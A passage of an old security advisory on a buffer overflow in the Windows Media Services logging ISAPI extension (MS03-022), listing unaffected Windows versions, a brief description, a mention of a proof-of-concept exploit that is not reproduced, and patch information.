Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0

- Unaffected program versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0

- Vulnerability discussion

Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.

- Exploit

The discoverer of this vulnerability is reported to possess working exploit code. This exploit is not publicly available and is not, at this time, known to be circulating in the wild.

The following proof-of-concept exploit has been supplied by Mati <muts@mutsonline.com>:

- Solution

** March 9, 2004 - Microsoft has reported that under certain circumstances the original security update provided to address this issue did not function properly and failed to replace the vulnerable file on an affected system. The issue results in situations relating to whether or not Windows Media Services was uninstalled previous to the application of the update. Microsoft has addressed this issue and released an updated Security Bulletin MS03-022. Please see the referenced bulletin for more information.

A patch has been made available for Windows 2000 and Windows 2000 Service Pack 3:

Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Datacenter Server SP4

- References

 

 
